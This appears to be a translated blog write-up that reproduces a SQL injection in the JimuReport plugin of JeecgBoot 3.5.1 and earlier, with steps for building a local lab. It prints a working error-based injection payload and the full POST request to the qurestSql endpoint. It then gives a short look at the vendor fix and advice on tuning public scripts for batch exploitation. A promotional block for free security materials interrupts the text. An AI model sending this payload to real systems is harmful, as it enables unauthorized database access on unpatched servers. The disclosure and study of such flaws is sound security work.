Introduction
JeecgBoot's code generator is a tool that can help developers quickly build enterprise-level applications. It can generate front-end and back-end codes with one click without writing any code, allowing developers to focus more on business logic.
Affected version
Jeecg-Boot<=3.5.1
Environment build
idea+
Backend source code:
https://github.com/jeecgboot/jeecg-boot/archive/refs/tags/v3.5.0.zip
Front-end source code:
https://github.com/jeecgboot/jeecgboot-vue3/archive/refs/tags/v3.5.0.zip
install npm
, install nodejs
https://nodejs.org/dist/v18.16.1/node-v18.16.1-x64.msi
install yarn
npm install -g yarn
download dependencies
yarn install
yarn run serve //起服务
Due to the separation of the front and back ends, the database import table is required, which can be imported directly using navicat
Build the back-end server, use idea to build and import projects, and modify the database configuration
Configure server-side npm service
Start directly after configuration, visit
http://localhost:3100/login
Successfully built
To help you study cybersecurity, you can receive a full set of information for free:
① Mind map of cybersecurity learning and growth path
② 60+ classic cybersecurity toolkits
③ 100+ SRC analysis reports
④ 150+ e-books on cybersecurity attack and defense techniques
⑤ The most authoritative CISSP Certification Exam Guide + Question Bank
⑥ More than 1800 pages of CTF Practical Skills Manual
⑦ Collection of the latest interview questions from network security companies (including answers)
⑧ APP Client Security Testing Guide (Android+IOS)
Vulnerability recurrence
The front and back ends are separated, the back end port is 8080, Payload:
{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Content-Type: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Length: 128
{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}
analyze
The vulnerability generation point is located in the building block report plug-in, check the updated version 3.5.1 update
The file at 72 has been changed, and db/其他数据库/jeecgboot-sqlserver2019.sql
the method of data insertion needs to be rewritten in the attention
jeecg-boot-base-core/src/main/java/org/jeecg/common/util/SqlInjectionUtil.java
Added regularity to sql statements in
This fix is for backend SQL injection,/sys/duplicate/check
The latest updated version 3.5.1 still does not seem to have some reinforcement measures for building block reports. Replace the jar package when repairing
At present, the official jar package of building blocks has been upgraded.
Pay attention to the upgrade log of building blocks in May
http://jimureport.com/doc/log
summary
There are master scripts on github, but if you want to use them in batches, it is recommended to modify the content of the response. If there are only errors reported for operation failures, there will be a large number of errors reported.
It is recommended to modify the echo of all custom if judgments, and please point out any mistakes.